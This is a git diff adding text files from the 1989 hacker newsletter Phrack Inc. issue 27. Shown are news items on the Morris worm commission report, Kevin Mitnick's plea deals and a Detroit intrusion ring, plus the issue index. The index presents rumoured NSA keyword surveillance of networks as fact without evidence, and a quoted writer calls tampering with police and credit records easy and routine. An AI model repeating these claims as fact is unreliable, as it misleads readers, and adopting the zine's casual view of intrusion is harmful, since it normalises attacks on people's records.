+constituted "reckless disregard of those probable consequences," the commission
+stated.
+
+Barker, who had delayed release of the report for six weeks at the request of
+both federal prosecutors and Morris's defense attorney, said, "We feel an
+overriding obligation to our colleagues and to the public to reveal what we
+know about this profoundly disturbing incident."
+
+The commission had sought to determine the involvement of Morris or other
+members of the Cornell community in the worm attack.  It also studied the
+motivation and ethical issues underlying the release of the worm.
+
+Evidence was gathered by interviewing Cornell faculty, staff, and graduate
+students and staff and former students at Harvard University, where Morris had
+done undergraduate work.
+
+Morris declined to be interviewed on advice of counsel.  Morris had requested
+and has received a leave of absence from Cornell, and the university is
+prohibited by federal law from commenting further on his status as a student.
+
+The commission also was unable to reach Paul Graham, a Harvard graduate student
+who knew Morris well.  Morris reportedly contacted Graham on November 2 1988,
+the day the worm was released, and several times before and after that.
+
+Relying on files from Morris's computer account, Cornell Computer Science
+Department documents, telephone records, media reports, and technical reports
+from other universities, the commission found that:
+
+     - Morris violated the Computer Sciences Department's expressed policies
+       against computer abuse.  Although he apparently chose not to attend
+       orientation meetings at which the policies were explained, Morris had
+       been given a copy of them.  Also, Cornell's policies are similar to
+       those at Harvard, with which he should have been familiar.
+
+     - No member of the Cornell community knew Morris was working on the worm.
+       Although he had discussed computer security with fellow graduate
+       students, he did not confide his plans to them.  Cornell first became
+       aware of Morris's involvement through a telephone call from the
+       Washington Post to the science editor at Cornell's News Service.
+
+     - Morris made only minimal efforts to halt the worm once it had
+       propagated, and did not inform any person in a position of
+       responsibility about the existence or content of the worm.
+
+     - Morris probably did not intend for the worm to destroy data or files,
+       but he probably did intend for it to spread widely.  There is no
+       evidence that he intended for the worm to replicate uncontrollably.
+
+     - Media reports that 6,000 computers had been infected were based on an
+       initial rough estimate that could not be confirmed.  "The total number
+       of affected computers was surely in the thousands," the commission
+       concluded.
+
+     - A computer security industry association's estimate that the worm caused
+       about $96 million in damage is "grossly exaggerated" and "self-serving."
+
+     - Although it was technically sophisticated, "the worm could have been
+       created by many students, graduate or undergraduate ... particularly if
+       forearmed with knowledge of the security flaws exploited or of similar
+       flaws."
+
+The commission was led by Cornell's vice president for information
+technologies, M. Stuart Lynn.  Other members were law professor Theodore
+Eisenberg, computer science Professor David Gries, engineering and computer
+science Professor Juris Hartmanis, physics professor Donald Holcomb, and
+Associate University Counsel Thomas Santoro.
+
+Release of the worm was not "an heroic event that pointed up the weaknesses of
+operating systems," the report said.  "The fact that UNIX ... has many security
+flaws has been generally well known, as indeed are the potential dangers of
+viruses and worms."
+
+The worm attacked only computers that were attached to Internet, a national
+research computer network and that used certain versions of the UNIX operating
+system.  An operating system is the basic program that controls the operation
+of a computer.
+
+"It is no act of genius or heroism to exploit such weaknesses," the
+commission said.
+
+The commission also did not accept arguments that one intended benefit of the
+worm was a heightened public awareness of computer security.
+
+"This was an accidental by-product of the event and the resulting display of
+media interest," the report asserted.  "Society does not condone burglary on
+the grounds that it heightens concern about safety and security."
+
+In characterizing the action, the commission said, "It may simply have been the
+unfocused intellectual meandering of a hacker completely absorbed with his
+creation and unharnessed by considerations of explicit purpose or potential
+effect."
+
+Because the commission was unable to contact Graham, it could not determine
+whether Graham discussed the worm with Morris when Morris visited Harvard about
+two weeks before the worm was launched.  "It would be interesting to know, for
+example, to what Graham was referring to in an Oct. 26 electronic mail message
+to Morris when he inquired as to whether there was 'Any news on the brilliant
+project?'" said the report.
+
+Many in the computer science community seem to favor disciplinary measures for
+Morris, the commission reported.
+
+"However, the general sentiment also seems to be prevalent that such
+disciplinary measures should allow for redemption and as such not be so harsh
+as to permanently damage the perpetrator's career," the report said.
+
+The commission emphasized, that this conclusion was only an impression from its
+investigations and not the result of a systematic poll of computer scientists.
+
+"Although the act was reckless and impetuous, it appears to have been an
+uncharacteristic act for Morris" because of his past efforts at Harvard and
+elsewhere to improve computer security, the commission report said.
+
+Of the need for increased security on research computers, the commission wrote,
+"A community of scholars should not have to build walls as high as the sky to
+protect a reasonable expectation of privacy, particularly when such walls will
+equally impede the free flow of information."
+
+The trust between scholars has yielded benefits to computer science and to the
+world at large, the commission report pointed out.
+
+"Violations of that trust cannot be condoned.  Even if there are unintended
+side benefits, which is arguable, there is a greater loss to the community
+as a whole."
+
+The commission did not suggest any specific changes in the policies of the
+Cornell Department of Computer Science and noted that policies against computer
+abuse are in place for centralized computer facilities.  However, the
+commission urged the appointment of a committee to develop a university-wide
+policy on computer abuse that would recognize the pervasive use of computers
+distributed throughout the campus.
+
+The commission also noted the "ambivalent attitude towards reporting UNIX
+security flaws" among universities and commercial vendors.  While some computer
+users advocate reporting flaws, others worry that such information might
+highlight the vulnerability of the system.
+
+"Morris explored UNIX security amid this atmosphere of uncertainty, where there
+were no clear ground rules and where his peers and mentors gave no clear
+guidance," the report said.
+
+"It is hard to fault him for not reporting flaws that he discovered.  From his
+viewpoint, that may have been the most responsible course of action, and one
+that was supported by his colleagues."
+
+The commission's report also included a brief account of the worm's course
+through Internet.  After its release shortly after 7:26 p.m. on November 2,
+1988, the worm spread to computers at the Massachusetts Institute of
+Technology, the Rand Corporation, the University of California at Berkeley and
+others, the commission report said.
+
+The worm consisted of two parts -- a short "probe" and a much larger "corpus."
+The problem would attempt to penetrate a computer, and if successful, send for
+the corpus.
+
+The program had four main methods of attack and several methods of defense to
+avoid discovery and elimination.  The attack methods exploited various flaws
+and features in the UNIX operating systems of the target computers.  The worm
+also attempted entry by "guessing" at passwords by such techniques as
+exploiting computer users' predilections for using common words as passwords.
+
+The study's authors acknowledged computer scientists at the University of
+California at Berkeley for providing a "decompiled" version of the worm and
+other technical information.  The Cornell commission also drew on analyses of
+the worm by Eugene H. Spafford of Purdue University and Donn Seeley of the
+University of Utah.
+_______________________________________________________________________________
+
+People Vs. ITT Communications Services, Inc.                     March 29, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+       NOTICE OF CLASS ACTION AND PROPOSED SETTLEMENT TO CERTAIN CURRENT
+       AND FORMER CUSTOMERS OF UNITED STATES TRANSMISSION SYSTEMS, INC.
+               (NOW KNOWN AS ITT COMMUNICATIONS SERVICES, INC.)
+
+By order of the United States District Court for the Eastern District of
+Michigan, PLEASE TAKE NOTICE THAT:
+
+A class action lawsuit has been filed on behalf of certain former and current
+customers against United States Transmission Systems, Inc., now known as ITT
+Communications Services, Inc., hereinafter referred to as "USTS."  The Court
+has preliminarily approved a settlement of this lawsuit.
+
+YOU ARE URGED TO READ THIS NOTICE CAREFULLY BECAUSE IT AFFECTS YOUR RIGHTS AND
+WILL BE BINDING ON YOU IN THE FUTURE.
+
+I. NOTICE OF A PENDING CLASS ACTION
+
+A. Description of the Lawsuit
+
+   Plaintiffs have sued USTS, alleging that USTS charged customers for certain
+   unanswered phone calls, holding time, busy signals, and central office
+   recorded messages, hereinafter referred to as "unanswered calls," without
+   adequately disclosing such charges to their customers or the public.
+   Plaintiffs seek to present their own claims for charges for unanswered
+   calls, as well as the claims of other current and former USTS customers for
+   similar charges.
+
+   USTS denies the violations alleged by plaintiffs, and contends that at all
+   times, USTS has charged its subscribers fairly and properly and has
+   disclosed fully and fairly the basis for its long distance charges.  USTS
+   has agreed to settle plaintiff's suit solely to avoid the expense,
+   inconvenience and disruption of further litigation.
+
+   This notice is not an expression of any opinion by the Court of the merits
+   of this litigation or of the Settlement Agreement.  The Complaint, the
+   Settlement Agreement and other pleadings in this case may be inspected
+   during normal business hours at the office of the Clerk of the United States
+   District Court for the Eastern District of Michigan, 231 West Lafayette
+   Boulevard, Detroit, MI 48226.
+
+B. The Settlement Class
+
+   Plaintiffs and USTS have entered into a Settlement Agreement, which has been
+   preliminarily approved by the Court.  Under the terms of the Settlement
+   Agreement, the parties have agreed, for purposes of settlement only, that
+   this suit has been brought on behalf of the following class of persons
+   similarly situated to Plaintiffs, hereinafter known as "the Class":
+
+   All persons and entities that subscribed to and utilized the long distance
+   telephone service of USTS or its predecessor ITT Corporate Communication
+   Services, Inc., referred to collectively hereinafter as "USTS," at any time
+   during the period January 1, 1979 through December 31, 1985.
+
+C. How to Remain a Class Member
+
+   If you were a subscriber to and utilized USTS' long distance service at any
+   time during this period, you are a member of the Class.  You need do nothing
+   to remain a member of the Class and participate in the benefits this
+   settlement will provide.  If you remain in the Class, you will be bound by
+   the results of the settlement and/or the lawsuit.
+
+D. How to Exclude Yourself From the Class
+
+   You are not required to be a member of the Class.  Should you decide that
+   you do not want to me a member of the Class, you must send an Exclusion
+   Notice that states your name, your current address, and your desire to be
+   excluded from the Class to the Clerk of the United States District Court for
+   the Eastern District of Michigan at the address given at the end of this
+   Notice, postmarked no later than April 20, 1989.  If you choose to be
+   excluded from the Class, you may not participate in the settlement.  You
+   will not, however, be bound by any judgment dismissing this action and you
+   will be free to pursue on your own behalf any legal rights you may have.
+
+
+ II. TERMS OF THE SETTLEMENT
+
+    The Settlement Agreement requires USTS to provide to Class members up to
+    750,000 minutes of long distance telephone credits having a maximum value,
+    at 30 cents per minute, of $225,000, hereinafter known as the "Settlement
+    Credits," and cash refunds up to a maximum of $50,000.  These benefits are
+    available to Class members who file a proof of claim in a timely manner as
+    described in Section III below.  Class members may choose one benefit from
+    the following options:
+
+    A. A *standardized credit* toward USTS long distance telephone service of
+       $1.50 for each year from 1979 through 1985 in which the Class member (i)
+       was a USTS customer, and (ii) claims that s/he was charged by USTS for
+       unanswered calls; or
+
+    B. A *standardized cash refund* of 90 cents for each year from 1979 through
+       1985 in which the Class member was (i) was a USTS customer and (ii)
+       claims that s/he was charged by USTS for unanswered calls; or,
+
+    C. An *itemized credit* toward USTS long distance service of 30 cents for
+       each minute of unanswered calls for which the Class member was charged
+       during the Class period (January 1, 1979 through December 31, 1985) and
+       for which the Class member has not been previously reimbursed or
+       credited; or,
+
+    D. An *itemized cash refund* of 30 cents for each minute of unanswered
+       calls for which the Class member charged during the Class period
+       (January 1, 1979 through December 31, 1985) and for which the Class
+       member has not been previously reimbursed or credited.
+
+    To obtain an *itemized* credit or cash refund, the Class member must
+    itemize and attest to each unanswered call for for which a refund or credit
+    is claimed.  If the total credits claimed by Class members exceed 750,000
+    credit minutes, each Class member claiming Settlement Credits will receive
+    his/her/its pro rata share of the total Settlement Credits available.
+
+    Class members need not be current USTS customers to claim the standardized
+    and itemized credits.  USTS will automatically open an account for any
+    Class member who requests credits and executes an authorization to open
+    such an account.  If a Class member incurs a local telephone company
+    service charge in connection with the opening of a USTS account, USTS will
+    issue a credit to the Class member's account for the full amount of such
+    service charge upon receipt of the local telephone company's bill for the
+    service charge.  USTS is not responsible for any other service charge that
+    a local telephone company may impose for ordering, using or terminating
+    USTS service.
+
+    The Settlement Agreement requires USTS to pay the costs of giving this
+    Notice (up to a maximum of $120,000) and of administering the settlement
+    described above.
+
+    The Settlement Agreement further provides that upon final approval of the
+    settlement, the Court will enter a judgment dismissing with prejudice all
+    claims of plaintiffs and members of the Class that have been or might have
+    been asserted in this action and that relate to USTS' billing practices and
+    disclosure practices for unanswered calls.
+
+    Counsel for the Class have investigated the facts and circumstances
+    regarding the claims against USTS and their defenses.  In view of those
+    circumstances, counsel for the Class have concluded that this Settlement
+    Agreement is fair and reasonable, and in the best interests of the Class.
+
+
+III. HOW TO FILE A CLAIM
+
+    To receive Settlement Credits or a Cash Refund, you must first obtain a
+    Proof of Claim Notice; then provide all the information requested and
+    return it to the Clerk of the Court postmarked no later than June 30, 1989.
+
+
+To obtain claim forms:                      To file completed claim form:
+
+USTS Class Action Claim Administrator       Clerk of the United States Court
+ITT Communication Services, Inc.            ATTN: USTS Settlement
+100 Plaza Drive                             231 W. Lafayette Blvd. Room 740
+Secaucus, NJ 07096                          Detroit, MI 48226
+
+If you have any further questions about this Notice, or the filing of Proof of
+Claim, *write* to the USTS Action Claim Administrator at the above address.  If
+you have any questions about this lawsuit or your participation therein as a
+member of the Class, *write* to lead counsel for plaintiffs --
+
+Sachnoff Weaver & Rubenstein, Ltd.
+ATTN: USTS Settlement
+30 South Wacker Drive, Suite 2900
+Chicago, IL 60606
+
+Always consult your own attorney for legal advice and questions which concern
+you about your rights in any class action matter.
+
+DO NOT telephone the Court.
+
+DO NOT telephone the attorneys for plaintiff.
+
+DO NOT telephone the Claims Administrator; any office of USTS or any of its
+       employees.
+
+DO NOT telephone any Telephone Company asking for information on this matter.
+       Only *written correspondence filed in a timely manner will be considered
+       by the Court.
+_______________________________________________________________________________
+
+Telenet Announces New PC Pursuit Terms                            April 9, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+Earlier this year, Telenet announced new terms for the PC Pursuit program,
+which placed time limits on the use of the service, and set new rates for
+usage of the service.
+
+               ***** Most of the deal has been called OFF *****
+
+In a letter dated March 29, 1989 from Floyd H. Trogdon, Vice President and
+General Manager of Network Services announced several revisions in the earlier
+plans.  His latest letter supersedes all previous memos and usage agreements,
+and becomes effective July 1, 1989.
+
+There will be THREE membership plans:
+
+     o  REGULAR membership will be $30 per month for up to 30 hours of
+        non-prime time (evenings and weekend) use.  This can be used by the
+        subscriber only.  No others allowed to use it.
+
+     o  FAMILY membership will be $50 per month for up to 60 hours of non-prime
+        time (evenings and weekend) use.  This can be used by the subscriber
+        and any immediate family members in the same household.  If a single
+        person expected to use more than 30 hours per month, s/he would still
+        buy this "family" plan, even if the entire "family" consisted of just
+        one person.
+
+     o  HANDICAPPED membership will be $30 per month for up to 90 hours of
+        non-prime time (evening and weekend) use.  To qualify for these terms,
+        proof of physical handicap must be provided.  Ask Telenet for the exact
+        terms.
+
+EXCESS HOURS over 30 (or 60/90) per month during non-prime time hours will be
+billed at $3.00 per hour.  This is a decrease from the earlier proposed charge
+of $4.50 per hour.
+
+PRIME-TIME USAGE will be billed at $10.50 per hour, regardless of how much time
+may be remaining on the PCP membership plan.
+
+The billing will be in arrears each month.  That is, the July usage will be
+billed in August, etc.  Call detail will be automatically provided to any
+subscriber going over thirty hours per month.
+
+GRACE PERIOD/FORGIVENESS:  All calls will be given a one minute grace period
+for the purpose of establishing the connection.  There will never be a charge
+for calls lasting one minute or less.  If you disconnect promptly when you see
+that your call will not complete for whatever reason, there will be no charge.
+
+There will be a two minute minimum on all connections (after the first minute
+has passed).  Otherwise, times will be rounded to the *nearest* minute for
+billing purposes.
+
+NEW PASSWORDS AND USER I.D.'s FOR EVERYONE:  During April, 1989, all current
+subscribers to PC Pursuit will be issued new passwords and new user identities.
+On May 1, 1989, all existing passwords and ID's will be killed.
+
+New users after July 1, 1989 will pay $30 to set up an account.  Password
+changes will be $5.00.  *Existing* users will never have to pay a fee to adjust
+their account upward or downward from regular < == > family plans.  Call detail
+will be provided in June, 1989 to users with more than 30 hours of usage to
+help them determine which plan they should use; however there will be no charge
+for extra hours until July.
+
+Because of the confusion and lack of good communication between Telenet and its
+users over the past few months, the official change in terms from unlimited use
+to measured use has been postponed from its original starting date in June to
+July 1.
+
+These are just excerpts from the letter to subscribers posted on the Net
+Exchange BBS.  If you subscribe to PC Pursuit, I recommend you sign on and read
+the full memo, along with the accompanying Terms and Conditions and price
+schedules.
+
+Remember, any changes you may have made in February/March in anticipation of
+the changeover originally planned for May/June are now void.  Telenet has
+stated all users will be defaulted to REGULAR memberships effective July 1
+unless they specifically make changes to this during the months of May and
+June.
+
+                   Telenet Customer Service:  1-800-336-0437
+                   Telenet Telemarketing:     1-800-TELENET
+
+Sign up via modem with credit card number handy:  1-800-835-3001.
+
+To read the full bulletins, log onto Net Exchange by calling into your local
+Telenet switcher and connecting to  '@pursuit'.
+_______________________________________________________________________________
diff --git a/phrack27/1.txt b/phrack27/1.txt
new file mode 100644
index 0000000..77264c9
--- /dev/null
+++ b/phrack27/1.txt
@@ -0,0 +1,100 @@
+                                
+                               ==Phrack Inc.==
+
+                     Volume Three, Issue 27, File 1 of 11
+
+                   Phrack Inc. Newsletter Issue XXVII Index
+                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                                June 20, 1989
+
+
+     Greetings and welcome to Issue 27 of Phrack Inc.  The pressure is on with
+SummerCon '89 just a couple short days away.  We're sorry it has taken so long
+to get this issue out, but summer break has created more responsibilities and
+busy schedules than we have ever had to deal with while in school.  Still, I
+think you will agree that this issue was worth the wait.
+
+     This issue we feature a new updated NUA and Datex-P list from Oberdaemon
+of Switzerland and Chapter 7 of the Future Transcendent Saga (taking into
+account that the SPAN and NSFnet files were chapters 5 and 6).  We also present
+the second part of the COSMOS file written by King Arthur.
+
+     Before we get to the main contents of the issue, we have a few comments to
+make regarding security and Phrack Inc.'s Internet access;
+
+     Thanks to a friend, we at Phrack Inc. have become aware of one of the main
+techniques that the National Security Agency (NSA) uses to perform surveillance
+on the wide area networks.
+
+     In certain messages that certain government agencies distribute, special
+phone numbers are included; WATS (800) numbers, to be more specific.  As these
+messages are distributed around the continent via various netmail and file
+transfer schemes, they are passed through several surveillance stations.  All
+of their stations perform one function, and in Unix terms, that function is
+called "grep."
+
+     Grep stands for G>lobal R>egular E>xpression search and P>rint.  The grep
+does simple string matching.  Every instance of these special 800-numbers in an
+email message (or batch of them) is flagged, recorded, and the record is mailed
+to certain intelligence agencies by the surveillance stations.
+
+     Here are the networks that we are reasonably certain that this practice is
+performed on:
+
+* USEnet  : Email is only checked in certain places, but ALL netnews (including
+            alt and any other nonstandard newsgroups) are flagged by a single
+            government domain SUN-3 that shall remain nameless.
+* ARPAnet : All mail going through a standard BBN (Bolt, Bernack, and
+            Neumann... a Cambridge/MIT spinoff) Internet controller will be
+            flagged, but the only information recorded by the controller is the
+            source and destination TCP/IP addresses of the message.  But when
+            you consider that this involves ***ALL*** DARPA mailing lists, you
+            get a visualization of the magnitude.  The reason more complex
+            information is NOT recorded is that this network is the only
+            AUTHORIZED place that these messages with the hot WATS are supposed
+            to appear.  You will see what this means in a moment.
+* BITnet  : Large IBM mainframe with I/O channel cycles to spare should have no
+            problem scanning mail from one of the most publically accessable
+            "free" networks.
+* Fidonet : The Secret Service scans this for credit card and other violations.
+            It is not too hard for them to check for the (800)'s, too.
+* W.Union : All international telex lines are scanned to match a whole lot of
+            stuff, especially drug-related information.  The phone numbers are
+            on their list.
+
+     We have other suspicions, but we are withholding them for now.
+
+     The other news is equally disturbing because it strikes us a little close
+to home.  We are temporarily losing our network access.  As of June 27, 1989
+through August 28, 1989 we will not have access to our accounts on UMCVMB
+mainframe system.  Make no attempt to mail us to our addresses there until
+August 28, 1989.  However, every cloud has a silver lining and this is no
+exception.  For networks people who wish to submit files to Phrack Inc. during
+this time period we proudly present our friend and associate, Hatchet Molly.
+He can be reached at "TK0GRM2@NIU.BITNET" and/or
+"TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU".
+
+     So here is to another great issue of Phrack Inc!
+
+               Taran King                        Knight Lightning
+
+                                 Hatchet Molly
+                              TK0GRM2@NIU.BITNET
+                      TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU
+_______________________________________________________________________________
+
+Table of Contents:
+
+1.  Phrack Inc. XXVII Index by Taran King and Knight Lightning
+2.  Operating The IBM VM/SP CP by Taran King
+3.  Introduction To MIDNET: Chapter Seven Of The FTS by Knight Lightning
+4.  NUA List For Datex-P And X.25 Networks by Oberdaemon
+5.  COSMOS:  COmputer System for Mainframe OperationS (Part Two) by King Arthur
+6.  Looking Around In DECnet by Deep Thought
+7.  The Making Of A Hacker by Framstag
+8.  Sending Fakemail In Unix by Dark OverLord
+9.  The Postal Inspection Service by Vendetta
+10. Phrack World News XXVII/Part 1 by Knight Lightning
+11. Phrack World News XXVII/Part 2 by Knight Lightning
+12. Phrack World News XXVII/Part 3 by Knight Lightning
+_______________________________________________________________________________
diff --git a/phrack27/10.txt b/phrack27/10.txt
new file mode 100644
index 0000000..4f12427
--- /dev/null
+++ b/phrack27/10.txt
@@ -0,0 +1,395 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 27, File 10 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN               Issue XXVII/Part 1                PWN
+            PWN                                                 PWN
+            PWN                  June 20, 1989                  PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+                 Welcome to Issue XXVII of Phrack World News!
+
+This issue features articles on SouthernNet's hacker scam, the Florida
+probation sex incident, bulletin boards in Argentina, fax attacks, computer
+security, other hacking occurrences, as well as more articles and new
+information about Kevin David Mitnick (aka Condor), Robert Tappan Morris, Karl
+Koch (Hagbard Celine, one of Clifford Stoll's "Wily Hackers"), TRW and Social
+Security Administration, the National Crime Information (NCIC) "Super
+Database," and many other fun stories.
+
+Because of our temporary exile from Bitnet, this will be the last regular issue
+of Phrack World News until next Fall.  Next issue expect to see the full
+write-up on the details and fun events of SummerCon '89.  It is only two days
+away as of this writing (it kinda begins on Thursday evening for some of us)
+and it looks to be the best SummerCon ever!
+
+A very special thanks goes to Delta Master, Hatchet Molly, and The Mad Hacker
+who all assisted with this issue's PWN by submitting articles.  Hatchet Molly
+will be serving as a collection agent for Phrack Inc. during the summer.  Be
+sure to forward any news articles to him that seem relevant to PWN and he will
+get them to me (eventually).  He can be reached on the wide area networks at;
+
+                                (Hatchet Molly)
+
+                              TK0GRM2@NIU.BITNET
+                      TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU
+
+One other thing to mention here is a special hello to one of our government
+readers... Peter Edmond Yee of NASA's Ames Research Center.  He had recently
+remarked that he "had access to Phrack!"  I wonder if he thought that Phrack
+Inc. was top secret or hard to get?  Still if he wanted it that badly, Taran
+King and I thought, "Why not make it easier on him and just send it to his
+network address?"  We did :-)))
+
+:Knight Lightning
+
+
+        "The Real Future Is Behind You... And It's Only The Beginning!"
+_______________________________________________________________________________
+
+Mitnick Plea Bargain Rejected By Judge As Too Lenient            April 25, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Excerpts from Kim Murphy (Los Angeles Times)
+
+             "Mr. Mitnick, you have been engaging in this conduct
+             for too long, and no one has actually punished you.
+             This is the last time you are going to do this."
+
+Reportedly U.S. District Judge Mariana Pfaelzer unexpectedly rejected the plea
+bargain of Kevin Mitnick, the hacker once called "as dangerous with a keyboard
+as a bank robber with a gun."  Pfaelzer declared that Mitnick deserves more
+time behind bars.
+
+As reported in recent issues of Phrack World News, "Mitnick pleaded guilty to
+one count of computer fraud and one count of possessing unauthorized
+long-distance telephone codes... Mitnick faces one year in prison.  Under a
+plea agreement with the government, he must also submit to three years'
+supervision by probation officers after his release from prison."
+
+On April 24, 1989 Judge Pfaelzer said, "Mr. Mitnick, you have been engaging in
+this conduct for too long, and no one has actually punished you.  This is the
+last time you are going to do this."  She said a confidential pre-sentence
+report recommended that she exceed even the 18-month maximum prison term called
+for under mandatory new federal sentencing guidelines.  The judge's action
+voids Mitnick's guilty plea.
+
+Both prosecuting and defense attorneys were surprised.  Mitnick's attorney said
+he did not know whether his client would agree to a guilty plea carrying a
+longer prison term.  This could make it harder to bring charges against
+Mitnick's alleged associates.  If Mitnick is brought to trial, testimony from
+at least one of his associates would be required to convict him, and they would
+not appear as witnesses without receiving immunity from prosecution.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Computer Hacker Working On Another Plea Bargain                     May 6, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Excerpts from the Los Angeles Herald Examiner
+
+Attorneys said yesterday they are negotiating a second plea bargain for
+computer hacker Kevin Mitnick, whose first offer to plead guilty was scuttled
+by a judge because it called for too little time in prison.
+
+Mitnick, 25, of Panorama City, California offered in March to serve one year in
+prison and to plead guilty to computer fraud and possessing unauthorized
+long-distance telephone codes.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Mitnick Update                                                     May 10, 1989
+~~~~~~~~~~~~~~
+Excerpts taken from the Los Angeles Times
+
+When last we heard about Kevin Mitnick, the hacker once called "as dangerous
+with a keyboard as a bank robber with a gun," the judge, Judge Mariana
+Pfaelzer, had rejected a plea bargain as too lenient, saying Mitnick deserved
+more than the agreed one year of jail time [see above articles].
+
+According to more recent information, Mitnick has now reached a new agreement,
+with no agreed-upon prison sentence.  He pleaded guilty to stealing a DEC
+security program and illegal possession of 16 long-distance telephone codes
+belonging to MCI Telecommunications Corp.  The two charges carry a maximum of
+15 years and a $500,000 fine.  The government agreed to lift telephone
+restrictions placed on Mitnick since he was jailed in December, 1988.
+
+At DEC's request, Mitnick will help the firm identify and fix holes in its
+security software to protect itself from other hackers.  He will also cooperate
+in the government's probe of Leonard DiCicco, a fellow hacker.  (DiCicco is the
+"friend" who turned Mitnick in.)
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Kenneth Siani Speaks Out About Kevin Mitnick                       May 23, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Kevin Mitnick, the hacker "so dangerous that he can't even be allowed to use a
+phone."  "He could ruin your life with his keyboard."  "Armed with a keyboard
+and considered dangerous."
+
+These are some of the things that have been said about this person.  All of
+this media hype would be fine if it just sold newspapers.  But it has done much
+more then just sell a few papers. It has influenced those that will ultimately
+decide his fate.  I myself do not know the man, but I have talked to others
+that do.  Including one of the persons that investigated Mitnick.  From all I
+have heard about him, I think he is a slime ball!  But even a slime ball should
+not be railroaded into a prison sentence that others of equal or greater guilt
+have avoided.
+
+I personally feel the man is just a criminal, like the guy that robs a 7/11, no
+better but certainly not any worse.  Unfortunately he is thought of as some
+kind of a "SUPER HACKER."  The head of Los Angeles Police Dept's Computer Crime
+Unit is quoted as saying, "Mitnick is several levels above what you would
+characterize as a computer hacker."
+
+No disrespect intended, but a statement like this from the head of a computer
+crime unit indicates his ignorance on the ability of hackers and phone phreaks.
+Sure he did things like access and perhaps even altered Police Department
+criminal records, credit records at TRW Corp, and Pacific Telephone,
+disconnecting phones of people he didn't like etc.  But what is not understood
+by most people outside of the hack/phreak world is that these things are VERY
+EASY TO DO AND ARE DONE ALL THE TIME.  In the hack/phreak community such
+manipulation of computer and phone systems is all to easy.  I see nothing
+special about his ability to do this.  The only thing special about Kevin
+Mitnick is that he is not a "novice" hacker like most of the thirteen year old
+kids that get busted for hacking/phreaking.  It has been a number of years
+since an "advanced" hacker has been arrested.  Not since the days of the Inner
+Circle gang have law enforcement authorities had to deal with a hacker working
+at this level of ability.  As a general rule, advanced hackers do not get
+caught because of there activity but rather it is almost always others that
+turn them in.  It is therefore easy to understand why his abilities are
+perceived as being extraordinary when in fact they are not.
+
+Because of all the media hype this case has received I'm afraid that:
+
+1.) He will not be treated fairly. He will be judged as a much greater threat
+    to society then others that have committed similar crimes.
+
+2.) He will become some kind of folk hero.  A Jesse James with a keyboard.
+    This will only cause other to follow in his footsteps.
+
+I'm not defending him or the things he has done in any sense.  All I'm saying
+is let's be fair.  Judge the man by the facts, not the headlines.
+
+Disclaimer:  The views expressed here are my own.
+
+  Kenneth Siani, Sr. Security Specialist, Information Systems Div., NYMA Inc.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+If you are looking for other articles about Kevin David Mitnick aka Condor
+please refer to;
+
+"Pacific Bell Means Business"                   (10/06/88) PWN XXI. . .Part 1
+"Dangerous Hacker Is Captured"                  (No Date ) PWN XXII . .Part 1
+"Ex-Computer Whiz Kid Held On New Fraud Counts" (12/16/88) PWN XXII . .Part 1
+"Dangerous Keyboard Artist"                     (12/20/88) PWN XXII . .Part 1
+"Armed With A Keyboard And Considered Dangerous"(12/28/88) PWN XXIII. .Part 1
+"Dark Side Hacker Seen As Electronic Terrorist" (01/08/89) PWN XXIII. .Part 1
+"Mitnick Plea Bargains"                         (03/16/89) PWN XXV. . .Part 1
+_______________________________________________________________________________
+
+Computer Intrusion Network in Detroit                              May 25, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken from the San Jose Mercury News (Knight-Ridder News Service)
+
+DETROIT -- Secret Service agents smashed what they described as a costly,
+sophisticated computer intrusion network on Wednesday, May 24, and were
+surprised to discover it made up largely of teen-agers.
+
+The computer systems of more than 20 companies including the Michigan
+Department of Treasury, Home Box Office cable television services, [and RCA]
+were infiltrated, according to agents serving search warrants across the
+country.
+
+Federal officials said the infiltrations by the network represented fraud of
+$200,000 to $1.5 million in appropriated goods, telephone and computer time.
+
+Agents expected to arrest some adults when they swept down on eight people who
+allegedly ran the network in several states.  Instead, they found only one
+adult, in Chicago.  The rest were teen-agers as young as 14:  Two in Columbus,
+Ohio; two in Boston, Massachusetts; two in Sterling Heights, Michigan [The
+Outsider and The Untouchable]; and one in Atlanta, Georgia.  Agents expected to
+make another arrest in Los Angeles.
+
+Officials said at least 55 other people nationwide made use of the network's
+information.
+
+In Sterling Heights, Secret Service agents pulled two eighth-grader boys, both
+14, out of school and questioned them in the presence of their parents, who
+apparently were unaware of their activities.  James Huse, special agent in
+charge of the U.S. Secret Service office in Detroit, said the youths admitted
+involvement in the scheme.
+
+He said the eight-graders, because they are juveniles, cannot be charged under
+federal law and will be dealt with by local juvenile authorities.
+
+Authorities believe the mastermind is Lynn Doucett, 35, of Chicago.  She was
+arrested Wednesday, May 24, and is cooperating with authorities, Huse said.
+
+Doucett, who was convicted in Canada of telecommunications fraud, supports
+herself and two children through her computer intrusion activities, which
+include using stolen or counterfeit credit cards for cash advances or money
